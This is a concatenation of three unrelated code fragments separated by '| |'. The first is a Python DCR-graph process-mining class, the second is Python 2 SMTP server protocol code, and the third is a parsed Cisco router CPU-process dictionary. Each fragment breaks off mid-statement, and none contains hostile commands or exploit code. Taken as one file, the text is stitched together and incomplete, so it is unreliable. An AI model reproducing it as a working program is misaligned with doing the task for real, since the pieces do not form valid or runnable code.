#arr = event_log.groupby('case:concept:name')['concept:name'].apply(lambda x: x.values).to_numpy()
self.logAbstraction['events'] = events.copy()
self.logAbstraction['traces'] = log
self.logAbstraction['atMostOnce'] = events.copy()
for event in events:
self.logAbstraction['chainPrecedenceFor'][event] = events.copy() - set([event])
self.logAbstraction['precedenceFor'][event] = events.copy() - set([event])
self.logAbstraction['predecessor'][event] = set()
self.logAbstraction['responseTo'][event] = events.copy() - set([event])
self.logAbstraction['successor'][event] = set()
for trace in self.logAbstraction['traces']:
self.parseTrace(trace)
for i in self.logAbstraction['predecessor']:
for j in self.logAbstraction['predecessor'][i]:
self.logAbstraction['successor'][j].add(i)
return 0
def parseTrace(self,trace):
'''
:param trace: array each trace one row and then events in order
:return: 0 if success anything else for failure
'''
localAtLeastOnce = set()
localSeenOnlyBefore = {}
lastEvent = ''
for event_dict in trace:
event = event_dict['concept:name']
# All events seen before this one must be predecessors
self.logAbstraction['predecessor'][event] = self.logAbstraction['predecessor'][event].union(localAtLeastOnce)
# If event seen before in trace, remove from atMostOnce
if event in localAtLeastOnce:
self.logAbstraction['atMostOnce'].discard(event)
localAtLeastOnce.add(event)
# Precedence for (event): All events that occured
# before (event) are kept in the precedenceFor set
self.logAbstraction['precedenceFor'][event] = self.logAbstraction['precedenceFor'][event].intersection(localAtLeastOnce)
# Chain-Precedence for (event): Some event must occur
# immediately before (event) in all traces
if lastEvent != '': #TODO: objects vs strings in sets
# If first time this clause is encountered - leaves lastEvent in chain-precedence set.
# The intersect is empty if this clause is encountered again with another lastEvent.
self.logAbstraction['chainPrecedenceFor'][event] = self.logAbstraction['chainPrecedenceFor'][event].intersection(set([lastEvent]))
else:
# First event in a trace, and chainPrecedence is therefore not possible
self.logAbstraction['chainPrecedenceFor'][event] = set()
# To later compute responses we note which events were seen before (event) and not after
if len(self.logAbstraction['responseTo'][event]) > 0:
# Save all events seen before (event)
localSeenOnlyBefore[event] = localAtLeastOnce.copy()
# Clear (event) from all localSeenOnlyBefore, since (event) has now occured after
for key in localSeenOnlyBefore:
localSeenOnlyBefore[key].discard(event)
lastEvent = event
for event in localSeenOnlyBefore:
# Compute set of events in trace that happened after (event)
seenOnlyAfter = localAtLeastOnce.difference(localSeenOnlyBefore[event])
# Delete self-relation
seenOnlyAfter.discard(event)
# Set of events that always happens after (event)
self.logAbstraction['responseTo'][event] = self.logAbstraction['responseTo'][event].intersection(seenOnlyAfter)
return 0
# Removes redundant relations based on transitive closure
def optimizeRelation(self,relation):
'''
if cond and resp A -> B, B -> C then you can remove an existing relation A -> C
:param relation:
:return:
'''
for eventA in relation:
for eventB in relation[eventA]:
relation[eventA] = relation[eventA].difference(relation[eventB])
return relation
def optimizeRelationTransitiveReduction(self,relation):
#TODO: 1. Adj. List to Adj Matrix, 2. Transive reduction, 3. back to Adj. List
for eventA in relation:
for eventB in relation[eventA]:
print('af')
def mineFromAbstraction(self,findAdditionalConditions:bool=True):
'''
:param findAttitionalConditions:
:return: a dcr graph
'''
# Initialize graph
# Note that events become an alias, but this is irrelevant since events are never altered
self.graph['events'] = self.logAbstraction['events'].copy()
self.graph['marking']['included'] = self.logAbstraction['events'].copy()
# Initialize all mappings to avoid indexing errors
for event in self.graph['events']:
self.graph['conditionsFor'][event] = set()
self.graph['excludesTo'][event] = set()
self.graph['includesTo'][event] = set()
self.graph['responseTo'][event] = set()
self.graph['milestonesFor'][event] = set()
# Mine self-exclusions
for event in self.logAbstraction['atMostOnce']:
self.graph['excludesTo'][event].add(event)
# Mine responses from logAbstraction
self.graph['responseTo'] = deepcopy(self.logAbstraction['responseTo'])
# Remove redundant responses
self.graph['responseTo'] = self.optimizeRelation(self.graph['responseTo'])
# Mine conditions from logAbstraction
self.graph['conditionsFor'] = deepcopy(self.logAbstraction['precedenceFor'])
# remove redundant conditions
self.graph['conditionsFor'] = self.optimizeRelation(self.graph['conditionsFor'])
# For each chainprecedence(i,j) we add: include(i,j) exclude(j,j)
for j in self.logAbstraction['chainPrecedenceFor']:
for i in self.logAbstraction['chainPrecedenceFor'][j]:
self.graph['includesTo'][i].add(j)
self.graph['excludesTo'][j].add(j)
# Additional excludes based on predecessors / successors
for event in self.logAbstraction['events']:
# Union of predecessor and successors sets, i.e. all events occuring in the same trace as event
coExisters = self.logAbstraction['predecessor'][event].union(self.logAbstraction['successor'][event])
nonCoExisters = self.logAbstraction['events'].difference(coExisters)
nonCoExisters.discard(event)
# Note that if events i & j do not co-exist, they should exclude each other.
# Here we only add i -->% j, but on the iteration for j, j -->% i will be added.
self.graph['excludesTo'][event] = self.graph['excludesTo'][event].union(nonCoExisters)
# if s precedes (event) but never succeeds (event) add (event) -->% s if s -->% s does not exist
precedesButNeverSuceeds = self.logAbstraction['predecessor'][event].difference(self.logAbstraction['successor'][event])
for s in precedesButNeverSuceeds:
if not s in self.graph['excludesTo'][s]:
self.graph['excludesTo'][event].add(s)
# Removing redundant excludes.
# If r always precedes s, and r -->% t, then s -->% t is (mostly) redundant
for s in self.logAbstraction['precedenceFor']:
for r in self.logAbstraction['precedenceFor'][s]:
for t in self.graph['excludesTo'][r]:
self.graph['excludesTo'][s].discard(t)
if findAdditionalConditions:
# Mining additional conditions:
# Every event, x, that occurs before some event, y, is a possible candidate for a condition x -->* y
# This is due to the fact, that in the traces where x does not occur before y, x might be excluded
possibleConditions = deepcopy(self.logAbstraction['predecessor'])
# Replay entire log, filtering out any invalid conditions
for trace in self.logAbstraction['traces']:
localSeenBefore = set()
included = self.logAbstraction['events'].copy()
for event_dict in trace:
event = event_dict['concept:name']
# Compute conditions that still allow event to be executed
excluded = self.logAbstraction['events'].difference(included)
validConditions = localSeenBefore.union(excluded)
# Only keep valid conditions
possibleConditions[event] = possibleConditions[event].intersection(validConditions)
# Execute excludes starting from (event)
included = included.difference(self.graph['excludesTo'][event])
# Execute includes starting from (event)
included = included.union(self.graph['includesTo'][event])
# Now the only possibleCondtitions that remain are valid for all traces
# These are therefore added to the graph
for key in self.graph['conditionsFor']:
self.graph['conditionsFor'][key] = self.graph['conditionsFor'][key].union(possibleConditions[key])
# Removing redundant conditions
self.graph['conditionsFor'] = self.optimizeRelation(self.graph['conditionsFor'])
return 0
def writeGraph(self,graph_path,timings=None):
'''
timings will be saved into the ISO 8601 duration format
:param graph_path:
:param timings:
:return:
'''
data = ''
withTimings = False
if timings:
withTimings = True
for event in self.graph['events']:
data = data + 'EVENT,' + event + '\n'
for endEvent in self.graph['conditionsFor']:
for startEvent in self.graph['conditionsFor'][endEvent]:
if withTimings and (('CONDITION',startEvent,endEvent) in timings.keys()):
data = data + 'CONDITION,' + startEvent + ',' + endEvent + ',' + 'DELAY,P' + str(int(timings[('CONDITION',startEvent,endEvent)])) +'D\n'
else:
data = data + 'CONDITION,' + startEvent + ',' + endEvent + '\n'
for startEvent in self.graph['responseTo']:
for endEvent in self.graph['responseTo'][startEvent]:
if withTimings and (('RESPONSE',startEvent,endEvent) in timings.keys()):
data = data + 'RESPONSE,' + startEvent + ',' + endEvent + ',' + 'DEADLINE,P' + str(int(timings[('RESPONSE',startEvent,endEvent)])) +'D\n'
else:
data = data + 'RESPONSE,' + startEvent + ',' + endEvent + '\n'
for startEvent in self.graph['excludesTo']:
for endEvent in self.graph['excludesTo'][startEvent]:
data = data + 'EXCLUDE,'+ startEvent + ',' + endEvent + '\n'
for startEvent in self.graph['includesTo']:
for endEvent in self.graph['includesTo'][startEvent]:
data = data + 'INCLUDE,'+ startEvent + ',' + endEvent + '\n'
with open(graph_path,'w+') as f:
f.write(data)
def write_with_do_subprocesses(self,graph_path,timings):
data = ''
withTimings = False
if timings:
withTimings = True
subprocesses = {}
for startEvent in self.graph['excludesTo']:
for endEvent in self.graph['excludesTo'][startEvent]:
if startEvent==endEvent:
if startEvent not in subprocesses.keys():
subprocesses[startEvent] = set()
subprocesses[startEvent].add(f'DO {startEvent}')
for event in self.graph['events']:
data = data + 'EVENT,' + event + '\n'
for subprocess_name,subprocess_events in subprocesses.items():
sub_events = '['
for event in subprocess_events:
sub_events = sub_events + event + ','
sub_events = sub_events[:-1] + ']'
data = data + 'SUBPROCESS,' +subprocess_name+ sub_events + '\n'
for endEvent in self.graph['conditionsFor']:
for startEvent in self.graph['conditionsFor'][endEvent]:
if withTimings and (('CONDITION',startEvent,endEvent) in timings.keys()):
data = data + 'CONDITION,' + startEvent + ',' + endEvent + ',' + 'DELAY,P' + str(int(timings[('CONDITION',startEvent,endEvent)])) +'D\n'
else:
data = data + 'CONDITION,' + startEvent + ',' + endEvent + '\n'
for startEvent in self.graph['responseTo']:
for endEvent in self.graph['responseTo'][startEvent]:
if withTimings and (('RESPONSE',startEvent,endEvent) in timings.keys()):
data = data + 'RESPONSE,' + startEvent + ',' + endEvent + ',' + 'DEADLINE,P' + str(int(timings[('RESPONSE',startEvent,endEvent)])) +'D\n'
else:
data = data + 'RESPONSE,' + startEvent + ',' + endEvent + '\n'
for startEvent in self.graph['excludesTo']:
for endEvent in self.graph['excludesTo'][startEvent]:
if startEvent==endEvent:
data = data + 'EXCLUDE,DO '+ startEvent + ',DO ' + endEvent + '\n'
else:
data = | |
re.compile(atom) # match any one atom character
def __init__(self, addr, defaultDomain=None):
if isinstance(addr, User):
addr = addr.dest
if isinstance(addr, Address):
self.__dict__ = addr.__dict__.copy()
return
elif not isinstance(addr, types.StringTypes):
addr = str(addr)
self.addrstr = addr
# Tokenize
atl = filter(None,self.tstring.split(addr))
local = []
domain = []
while atl:
if atl[0] == '<':
if atl[-1] != '>':
raise AddressError, "Unbalanced <>"
atl = atl[1:-1]
elif atl[0] == '@':
atl = atl[1:]
if not local:
# Source route
while atl and atl[0] != ':':
# remove it
atl = atl[1:]
if not atl:
raise AddressError, "Malformed source route"
atl = atl[1:] # remove :
elif domain:
raise AddressError, "Too many @"
else:
# Now in domain
domain = ['']
elif len(atl[0]) == 1 and not self.atomre.match(atl[0]) and atl[0] != '.':
raise AddressError, "Parse error at %r of %r" % (atl[0], (addr, atl))
else:
if not domain:
local.append(atl[0])
else:
domain.append(atl[0])
atl = atl[1:]
self.local = ''.join(local)
self.domain = ''.join(domain)
if self.local != '' and self.domain == '':
if defaultDomain is None:
defaultDomain = DNSNAME
self.domain = defaultDomain
dequotebs = re.compile(r'\\(.)')
def dequote(self,addr):
"""Remove RFC-2821 quotes from address."""
res = []
atl = filter(None,self.tstring.split(str(addr)))
for t in atl:
if t[0] == '"' and t[-1] == '"':
res.append(t[1:-1])
elif '\\' in t:
res.append(self.dequotebs.sub(r'\1',t))
else:
res.append(t)
return ''.join(res)
def __str__(self):
if self.local or self.domain:
return '@'.join((self.local, self.domain))
else:
return ''
def __repr__(self):
return "%s.%s(%s)" % (self.__module__, self.__class__.__name__,
repr(str(self)))
class User:
"""Hold information about and SMTP message recipient,
including information on where the message came from
"""
def __init__(self, destination, helo, protocol, orig):
host = getattr(protocol, 'host', None)
self.dest = Address(destination, host)
self.helo = helo
self.protocol = protocol
if isinstance(orig, Address):
self.orig = orig
else:
self.orig = Address(orig, host)
def __getstate__(self):
"""Helper for pickle.
protocol isn't picklabe, but we want User to be, so skip it in
the pickle.
"""
return { 'dest' : self.dest,
'helo' : self.helo,
'protocol' : None,
'orig' : self.orig }
def __str__(self):
return str(self.dest)
class IMessage(Interface):
"""Interface definition for messages that can be sent via SMTP."""
def lineReceived(line):
"""handle another line"""
def eomReceived():
"""handle end of message
return a deferred. The deferred should be called with either:
callback(string) or errback(error)
"""
def connectionLost():
"""handle message truncated
semantics should be to discard the message
"""
class SMTP(basic.LineOnlyReceiver, policies.TimeoutMixin):
"""SMTP server-side protocol."""
timeout = 600
host = DNSNAME
portal = None
# Control whether we log SMTP events
noisy = True
# A factory for IMessageDelivery objects. If an
# avatar implementing IMessageDeliveryFactory can
# be acquired from the portal, it will be used to
# create a new IMessageDelivery object for each
# message which is received.
deliveryFactory = None
# An IMessageDelivery object. A new instance is
# used for each message received if we can get an
# IMessageDeliveryFactory from the portal. Otherwise,
# a single instance is used throughout the lifetime
# of the connection.
delivery = None
# Cred cleanup function.
_onLogout = None
def __init__(self, delivery=None, deliveryFactory=None):
self.mode = COMMAND
self._from = None
self._helo = None
self._to = []
self.delivery = delivery
self.deliveryFactory = deliveryFactory
def timeoutConnection(self):
msg = '%s Timeout. Try talking faster next time!' % (self.host,)
self.sendCode(421, msg)
self.transport.loseConnection()
def greeting(self):
return '%s NO UCE NO UBE NO RELAY PROBES' % (self.host,)
def connectionMade(self):
# Ensure user-code always gets something sane for _helo
peer = self.transport.getPeer()
try:
host = peer.host
except AttributeError: # not an IPv4Address
host = str(peer)
self._helo = (None, host)
self.sendCode(220, self.greeting())
self.setTimeout(self.timeout)
def sendCode(self, code, message=''):
"Send an SMTP code with a message."
lines = message.splitlines()
lastline = lines[-1:]
for line in lines[:-1]:
self.sendLine('%3.3d-%s' % (code, line))
self.sendLine('%3.3d %s' % (code,
lastline and lastline[0] or ''))
def lineReceived(self, line):
self.resetTimeout()
return getattr(self, 'state_' + self.mode)(line)
def state_COMMAND(self, line):
# Ignore leading and trailing whitespace, as well as an arbitrary
# amount of whitespace between the command and its argument, though
# it is not required by the protocol, for it is a nice thing to do.
line = line.strip()
parts = line.split(None, 1)
if parts:
method = self.lookupMethod(parts[0]) or self.do_UNKNOWN
if len(parts) == 2:
method(parts[1])
else:
method('')
else:
self.sendSyntaxError()
def sendSyntaxError(self):
self.sendCode(500, 'Error: bad syntax')
def lookupMethod(self, command):
return getattr(self, 'do_' + command.upper(), None)
def lineLengthExceeded(self, line):
if self.mode is DATA:
for message in self.__messages:
message.connectionLost()
self.mode = COMMAND
del self.__messages
self.sendCode(500, 'Line too long')
def do_UNKNOWN(self, rest):
self.sendCode(500, 'Command not implemented')
def do_HELO(self, rest):
peer = self.transport.getPeer()
try:
host = peer.host
except AttributeError:
host = str(peer)
self._helo = (rest, host)
self._from = None
self._to = []
self.sendCode(250, '%s Hello %s, nice to meet you' % (self.host, host))
def do_QUIT(self, rest):
self.sendCode(221, 'See you later')
self.transport.loseConnection()
# A string of quoted strings, backslash-escaped character or
# atom characters + '@.,:'
qstring = r'("[^"]*"|\\.|' + atom + r'|[@.,:])+'
mail_re = re.compile(r'''\s*FROM:\s*(?P<path><> # Empty <>
|<''' + qstring + r'''> # <addr>
|''' + qstring + r''' # addr
)\s*(\s(?P<opts>.*))? # Optional WS + ESMTP options
$''',re.I|re.X)
rcpt_re = re.compile(r'\s*TO:\s*(?P<path><' + qstring + r'''> # <addr>
|''' + qstring + r''' # addr
)\s*(\s(?P<opts>.*))? # Optional WS + ESMTP options
$''',re.I|re.X)
def do_MAIL(self, rest):
if self._from:
self.sendCode(503,"Only one sender per message, please")
return
# Clear old recipient list
self._to = []
m = self.mail_re.match(rest)
if not m:
self.sendCode(501, "Syntax error")
return
try:
addr = Address(m.group('path'), self.host)
except AddressError, e:
self.sendCode(553, str(e))
return
validated = defer.maybeDeferred(self.validateFrom, self._helo, addr)
validated.addCallbacks(self._cbFromValidate, self._ebFromValidate)
def _cbFromValidate(self, from_, code=250, msg='Sender address accepted'):
self._from = from_
self.sendCode(code, msg)
def _ebFromValidate(self, failure):
if failure.check(SMTPBadSender):
self.sendCode(failure.value.code,
'Cannot receive from specified address %s: %s'
% (quoteaddr(failure.value.addr), failure.value.resp))
elif failure.check(SMTPServerError):
self.sendCode(failure.value.code, failure.value.resp)
else:
log.err(failure, "SMTP sender validation failure")
self.sendCode(
451,
'Requested action aborted: local error in processing')
def do_RCPT(self, rest):
if not self._from:
self.sendCode(503, "Must have sender before recipient")
return
m = self.rcpt_re.match(rest)
if not m:
self.sendCode(501, "Syntax error")
return
try:
user = User(m.group('path'), self._helo, self, self._from)
except AddressError, e:
self.sendCode(553, str(e))
return
d = defer.maybeDeferred(self.validateTo, user)
d.addCallbacks(
self._cbToValidate,
self._ebToValidate,
callbackArgs=(user,)
)
def _cbToValidate(self, to, user=None, code=250, msg='Recipient address accepted'):
if user is None:
user = to
self._to.append((user, to))
self.sendCode(code, msg)
def _ebToValidate(self, failure):
if failure.check(SMTPBadRcpt, SMTPServerError):
self.sendCode(failure.value.code, failure.value.resp)
else:
log.err(failure)
self.sendCode(
451,
'Requested action aborted: local error in processing'
)
def _disconnect(self, msgs):
for msg in msgs:
try:
msg.connectionLost()
except:
log.msg("msg raised exception from connectionLost")
log.err()
def do_DATA(self, rest):
if self._from is None or (not self._to):
self.sendCode(503, 'Must have valid receiver and originator')
return
self.mode = DATA
helo, origin = self._helo, self._from
recipients = self._to
self._from = None
self._to = []
self.datafailed = None
msgs = []
for (user, msgFunc) in recipients:
try:
msg = msgFunc()
rcvdhdr = self.receivedHeader(helo, origin, [user])
if rcvdhdr:
msg.lineReceived(rcvdhdr)
msgs.append(msg)
except SMTPServerError, e:
self.sendCode(e.code, e.resp)
self.mode = COMMAND
self._disconnect(msgs)
return
except:
log.err()
self.sendCode(550, "Internal server error")
self.mode = COMMAND
self._disconnect(msgs)
return
self.__messages = msgs
self.__inheader = self.__inbody = 0
self.sendCode(354, 'Continue')
if self.noisy:
fmt = 'Receiving message for delivery: from=%s to=%s'
log.msg(fmt % (origin, [str(u) for (u, f) in recipients]))
def connectionLost(self, reason):
# self.sendCode(421, 'Dropping connection.') # This does nothing...
# Ideally, if we (rather than the other side) lose the connection,
# we should be able to tell the other side that we are going away.
# RFC-2821 requires that we try.
if self.mode is DATA:
try:
for message in self.__messages:
try:
message.connectionLost()
except:
log.err()
del self.__messages
except AttributeError:
pass
if self._onLogout:
self._onLogout()
self._onLogout = None
self.setTimeout(None)
def do_RSET(self, rest):
self._from = None
self._to = []
self.sendCode(250, 'I remember nothing.')
def dataLineReceived(self, line):
if line[:1] == '.':
if line == '.':
self.mode = COMMAND
if self.datafailed:
self.sendCode(self.datafailed.code,
self.datafailed.resp)
return
if not self.__messages:
self._messageHandled("thrown away")
return
defer.DeferredList([
m.eomReceived() for m in self.__messages
], consumeErrors=True).addCallback(self._messageHandled
)
del self.__messages
return
line = line[1:]
if self.datafailed:
return
try:
# Add a blank line between the generated Received:-header
# and the message body if the message | |
536: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 549,
'one_min_cpu': 0.0,
'pid': 540,
'process': 'LDP Background',
'runtime': 266,
'tty': 0,
'usecs': 484},
537: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 254919,
'one_min_cpu': 0.0,
'pid': 541,
'process': 'MCP RP EFP proce',
'runtime': 1468,
'tty': 0,
'usecs': 5},
538: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 207,
'one_min_cpu': 0.0,
'pid': 542,
'process': 'BGP Event',
'runtime': 9701,
'tty': 0,
'usecs': 46864},
539: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 2902,
'one_min_cpu': 0.0,
'pid': 543,
'process': 'LDP Main',
'runtime': 149,
'tty': 0,
'usecs': 51},
540: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 15020,
'one_min_cpu': 0.0,
'pid': 544,
'process': 'LDP Hello',
'runtime': 854,
'tty': 0,
'usecs': 56},
541: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1320,
'one_min_cpu': 0.0,
'pid': 545,
'process': 'BGP Task',
'runtime': 13752,
'tty': 0,
'usecs': 10418},
542: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1,
'one_min_cpu': 0.0,
'pid': 546,
'process': 'BGP BMP Server',
'runtime': 0,
'tty': 0,
'usecs': 0},
543: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 93,
'one_min_cpu': 0.0,
'pid': 547,
'process': 'TCP Listener',
'runtime': 0,
'tty': 0,
'usecs': 0},
544: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 551,
'one_min_cpu': 0.0,
'pid': 548,
'process': 'IPRM',
'runtime': 2,
'tty': 0,
'usecs': 3},
545: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 673,
'one_min_cpu': 0.0,
'pid': 549,
'process': 'IP SNMP',
'runtime': 36,
'tty': 0,
'usecs': 53},
546: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1,
'one_min_cpu': 0.0,
'pid': 550,
'process': 'PDU DISPATCHER',
'runtime': 0,
'tty': 0,
'usecs': 0},
547: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 4,
'one_min_cpu': 0.0,
'pid': 551,
'process': 'SNMP ENGINE',
'runtime': 1,
'tty': 0,
'usecs': 250},
548: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 2,
'one_min_cpu': 0.0,
'pid': 552,
'process': 'IP SNMPV6',
'runtime': 0,
'tty': 0,
'usecs': 0},
549: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1,
'one_min_cpu': 0.0,
'pid': 553,
'process': 'SNMP ConfCopyPro',
'runtime': 0,
'tty': 0,
'usecs': 0},
550: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 387,
'one_min_cpu': 0.0,
'pid': 554,
'process': 'SNMP Traps',
'runtime': 416,
'tty': 0,
'usecs': 1074},
551: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 33806,
'one_min_cpu': 0.0,
'pid': 555,
'process': 'NTP',
'runtime': 851,
'tty': 0,
'usecs': 25},
552: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1,
'one_min_cpu': 0.0,
'pid': 556,
'process': 'EM Action CNS',
'runtime': 0,
'tty': 0,
'usecs': 0},
553: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 2,
'one_min_cpu': 0.0,
'pid': 557,
'process': 'DiagCard5/-1',
'runtime': 0,
'tty': 0,
'usecs': 0},
554: {'five_min_cpu': 0.73,
'five_sec_cpu': 0.55,
'invoked': 78644,
'one_min_cpu': 0.72,
'pid': 558,
'process': 'BGP Router',
'runtime': 307942,
'tty': 0,
'usecs': 3915},
555: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 10680,
'one_min_cpu': 0.0,
'pid': 559,
'process': 'OSPF-65109 Hello',
'runtime': 311,
'tty': 0,
'usecs': 29},
556: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1,
'one_min_cpu': 0.0,
'pid': 560,
'process': 'BGP VA',
'runtime': 0,
'tty': 0,
'usecs': 0},
557: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1,
'one_min_cpu': 0.0,
'pid': 561,
'process': 'IFCOM Msg Hdlr',
'runtime': 0,
'tty': 0,
'usecs': 0},
558: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1,
'one_min_cpu': 0.0,
'pid': 562,
'process': 'IFCOM Msg Hdlr',
'runtime': 0,
'tty': 0,
'usecs': 0},
559: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1,
'one_min_cpu': 0.0,
'pid': 563,
'process': 'IFCOM Msg Hdlr',
'runtime': 0,
'tty': 0,
'usecs': 0},
560: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1,
'one_min_cpu': 0.0,
'pid': 564,
'process': 'IFCOM Msg Hdlr',
'runtime': 0,
'tty': 0,
'usecs': 0},
561: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1,
'one_min_cpu': 0.0,
'pid': 565,
'process': 'Network Synchron',
'runtime': 0,
'tty': 0,
'usecs': 0},
562: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 127232,
'one_min_cpu': 0.0,
'pid': 566,
'process': 'CCM Subscriber P',
'runtime': 862,
'tty': 0,
'usecs': 6},
563: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 4,
'one_min_cpu': 0.0,
'pid': 567,
'process': 'Process to do EH',
'runtime': 0,
'tty': 0,
'usecs': 0},
564: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 11,
'one_min_cpu': 0.0,
'pid': 568,
'process': 'RFS server proce',
'runtime': 0,
'tty': 0,
'usecs': 0},
565: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 2,
'one_min_cpu': 0.0,
'pid': 569,
'process': 'IP MPLS Service',
'runtime': 0,
'tty': 0,
'usecs': 0},
566: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1,
'one_min_cpu': 0.0,
'pid': 570,
'process': 'HA-IDB-SYNC',
'runtime': 0,
'tty': 0,
'usecs': 0},
567: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 2,
'one_min_cpu': 0.0,
'pid': 571,
'process': 'VTEMPLATE Backgr',
'runtime': 0,
'tty': 0,
'usecs': 0},
568: {'five_min_cpu': 0.75,
'five_sec_cpu': 0.0,
'invoked': 9517,
'one_min_cpu': 0.28,
'pid': 573,
'process': 'Virtual Exec',
'runtime': 4487,
'tty': 2,
'usecs': 471},
569: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 15,
'one_min_cpu': 0.0,
'pid': 574,
'process': 'L2FIB HA Flow Th',
'runtime': 4,
'tty': 0,
'usecs': 266},
570: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 75795,
'one_min_cpu': 0.0,
'pid': 575,
'process': 'Virtual Exec',
'runtime': 66557,
'tty': 3,
'usecs': 878},
571: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 19063,
'one_min_cpu': 0.0,
'pid': 576,
'process': 'Virtual Exec',
'runtime': 13105,
'tty': 4,
'usecs': 687},
572: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 797,
'one_min_cpu': 0.0,
'pid': 577,
'process': 'Virtual Exec',
'runtime': 4208,
'tty': 5,
'usecs': 5279},
573: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 542,
'one_min_cpu': 0.0,
'pid': 578,
'process': 'Virtual Exec',
'runtime': 71,
'tty': 6,
'usecs': 130},
574: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 448,
'one_min_cpu': 0.0,
'pid': 606,
'process': 'LCON Addr',
'runtime': 17,
'tty': 0,
'usecs': 37}},
'zero_cpu_processes': ['Chunk Manager',
'Load Meter',
'SpanTree Helper',
'Retransmission o',
'IPC ISSU Dispatc',
'RF Slave Main Th',
'EDDRI_MAIN',
'RO Notify Timers',
'Pool Manager',
'DiscardQ Backgro',
'Timers',
'WATCH_AFS',
'MEMLEAK PROCESS',
'ARP Input',
'ARP Background',
'ATM Idle Timer',
'ATM ASYNC PROC',
'AAA_SERVER_DEADT',
'Policy Manager',
'DDR Timers',
'Entity MIB API',
'PrstVbl',
'RMI RM Notify Wa',
'IOSXE heartbeat',
'ATM AutoVC Perio',
'ATM VC Auto Crea',
'IPC Apps Task',
'ifIndex Receive',
'IPC Event Notifi',
'IPC Mcast Pendin',
'ASR1000 appsess',
'IPC Dynamic Cach',
'IPC Service NonC',
'IPC Zone Manager',
'IPC Periodic Tim',
'IPC Deferred Por',
'IPC Process leve',
'IPC Seat Manager',
'IPC Check Queue',
'IPC Seat RX Cont',
'IPC Seat TX Cont',
'IPC Keep Alive M',
'IPC Loadometer',
'IPC Session Deta',
'SENSOR-MGR event',
'Compute SRP rate',
'CEF MIB API',
'Serial Backgroun',
'GraphIt',
'Dialer event',
'IOSXE signals IO',
'SMART',
'client_entity_se',
'RF SCTPthread',
'CHKPT RG SCTPthr',
'Critical Bkgnd',
'Net Background',
'IDB Work',
'Logger',
'TTY Background',
'BACK CHECK',
'IOSD chasfs task',
'REDUNDANCY FSM',
'SBC IPC Hold Que',
'Punt FP Stats Du',
'PuntInject Keepa',
'IF-MGR control p',
'IF-MGR event pro',
'cpf_msg_holdq_pr',
'cpf_msg_rcvq_pro',
'cpf_process_tpQ',
'Network-rf Notif',
'Environmental Mo',
'RP HA Periodic',
'CONSOLE helper p',
'CEF RRP RF waite',
'CWAN APS HA Proc',
'REDUNDANCY peer',
'100ms check',
'RF CWAN HA Proce',
'CWAN IF EVENT HA',
'ANCP HA',
'ANCP HA IPC flow',
'QoS HA ID RETAIN',
'CHKPT Test clien',
'CHKPT Test clien',
'CHKPT Test clien',
'CHKPT Test clien',
'CHKPT Test clien',
'CHKPT Test clien',
'CHKPT Test clien',
'CHKPT Test clien',
'CHKPT Test clien',
'CHKPT Test clien',
'CHKPT Test clien',
'DHCPC HA',
'DHCPD HA',
'DHCPv6 Relay HA',
'DHCPv6 Server HA',
'Metadata HA',
'FMD HA IPC flow',
'SISF HA Process',
'ARP HA',
'XDR RRP RF waite',
'IOSXE-RP Punt IP',
'IOSXE-RP SPA TSM',
'RF Master Main T',
'RF Master Status',
'Net Input',
'OTV Event Dispat',
'Compute load avg',
'Per-minute Jobs',
'mLDP Process',
'Transport Port A',
'EEM ED ND',
'IOSXE-RP FastPat',
'Src Fltr backgro',
'DSX3MIB ll handl',
'fanrp_l2fib',
'POS APS Event Pr',
'netclk_process',
'netclk_ha_proces',
'FPD Management P',
'FPD Action Proce',
'BFD HW EVENT',
'BFD IPV6 ADDR CH',
'FEC_Link_event_h',
'MCP RP autovc pr',
'VMI Background',
'MGMTE stats Proc',
'Ether-SPA backgr',
'CWAN CHOCX PROCE',
'CE3 Mailbox',
'CT3 Mailbox',
'HAL Mailbox',
'MIP Mailbox',
'CWAN OIR Handler',
'TP CUTOVER EVENT',
'ASR1K ESMC Proce',
'ASR1000-RP SPA A',
'RTTYS Process',
'AAA Server',
'AAA ACCT Proc',
